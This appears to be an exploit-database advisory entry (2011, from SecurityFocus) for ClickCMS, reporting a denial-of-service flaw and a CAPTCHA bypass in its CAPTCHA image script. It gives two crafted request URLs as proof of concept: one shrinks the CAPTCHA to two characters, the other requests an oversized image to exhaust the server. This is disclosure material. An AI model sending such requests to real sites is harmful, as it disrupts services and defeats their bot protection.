ClickCMS - Denial of Service / CAPTCHA Bypass
Author: MustLive
type: webapps
platform: php
port:
date_added: 2011-08-29
date_updated: 2015-02-16
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/49361/info
ClickCMS is prone to a denial-of-service vulnerability and a CAPTCHA-bypass vulnerability.
Attackers can leverage these issues to cause the affected server to stop responding or to bypass certain security mechanisms.
http://www.example.com/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2
http://www.example.com/captcha/CaptchaSecurityImages.php?width=1000&height=9000